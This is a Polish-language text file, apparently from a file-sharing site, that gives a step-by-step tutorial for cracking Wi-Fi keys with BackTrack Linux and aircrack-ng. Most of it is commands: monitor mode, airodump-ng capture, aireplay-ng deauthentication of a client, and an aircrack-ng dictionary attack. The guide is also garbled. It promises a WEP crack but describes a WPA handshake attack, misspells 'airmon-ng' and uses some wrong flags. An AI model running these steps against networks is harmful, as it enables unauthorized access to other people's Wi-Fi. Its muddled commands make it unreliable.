Nowy dokument tekstowy (3).txt

(2 KB) Pobierz
WEP - zabezpieczenie o którym dzisiaj mowa - było skuteczne do czasu aż nie zostało złamane :) 
Jest to jeden ze sposobów szyfrowania sieci wifi (*a więc np. naszych routerów). Wbrew pozorom korzysta z niego wcišż baaaaardzzzoo wielu użytkowników. Przeważnie jest to klucz 64bitowy - dzisiaj nie wystarczajšcy ! Złamanie sieci zabezpieczonej w ten sposób może trwać od 5 do 15 minut w zależnoci od ruchu sieciowego jaki generuje.
 WPA - lepsze niż WEP ! Jest to następca WEP - warto przyjrzeć się WPA2 które jest znacznie bezpieczniejsze i radziłbym korzystać włanie z tego zabezpieczenia. Jednak nie ma rzeczy na 100% skutecznych, a więc gdy widzimy że nasza sieć jest mocno obcišżona to znaczy że co jest nie tak !
Istnieje jeszcze kilka innych zabezpieczeń - ale te sš tymi najpopularniejszymi. 

Do rzeczy ... jak złamać WEP ! 

Warto skorzystać w tym celu z narzędzi przeznaczonych dla systemu LINUX. I włanie opiszę sposób na system "pingwinkowy" - za pomocš którego można poznać klucz sieciowy ! 
Oczywicie program można odpalić jako płytę bootowalnš i nie trzeba instalować programu o którym napiszę. 
Takim kombajnem hakerów jest platforma, która nazywa się "Backtrack" 
  www.backtrack-linux.org

System możemy pobrać z tej strony : http://www.backtrack-linux.org/downloads/

Po uruchomieniu backtracka - albo w wersji bootowalnej (live cd) albo po zainstalowaniu w komputerze (np. laptopie - z kartš bezprzewodowš) należy go uruchomić wpisujšc : startx 
ta komenda uruchamia system !

Po pierwsze uruchamiamy konsolę backtracka i wpisujemy :
iwconfig wlan0 mode monitor
oczywicie za wlan0 - odpowiednio podstawiamy nasz interfejs karty sieciowej, ale w większoci przypadków będzie to wlan0 ! Aby sprawdzić jaki mamy interfejs wpisujemy :
iwconfig
Następnie należy uruchomić airmon :
arimon-ng start wlan0
Teraz sprawdzimy sieci które sš w naszym zasięgu ;
arimon-ng --encrypt wpa wlan0
Teraz należy wybrać cel (*naszš sieć) i zapamiętać takie informacje jak : ESSID, BSSID, MAC (*Station) oraz CHANNEL ! 
Teraz włšczamy nasz skaner :
airodump-ng --write haslo.cap --channel X --bssid aa:aa:aa:aa:aa:aa  --encrypt wpa wlan0
odpowiednio podstawiamy  nazwa.cap - gdzie zapisujemy - channel X - numer kanału, bssid czyli numer station mac oraz wlan0 - zależne od interfejsu jaki posiadamy !
Po wpisaniu wykonamy metodę "handshake" !
Teraz w nowej konsoli analogicznie wpisujemy (aby przyspieszyć zdobywanie pakietów ) :
aireplay-ng -0 1 -a aa:aa:aa:aa:aa:aa -c aa:aa:aa:aa:aa:aa wlan0 
pierwsze to nasz adres mac - a drugi to cel - też numer mac station ! 
Teraz czekamy i czekamy .... 
I wpisujemy w konsoli : (* motoda słownikowa)
aircrack-ng  -c haslo.cap -w  slownik.txt
Zgłoś jeśli naruszono regulamin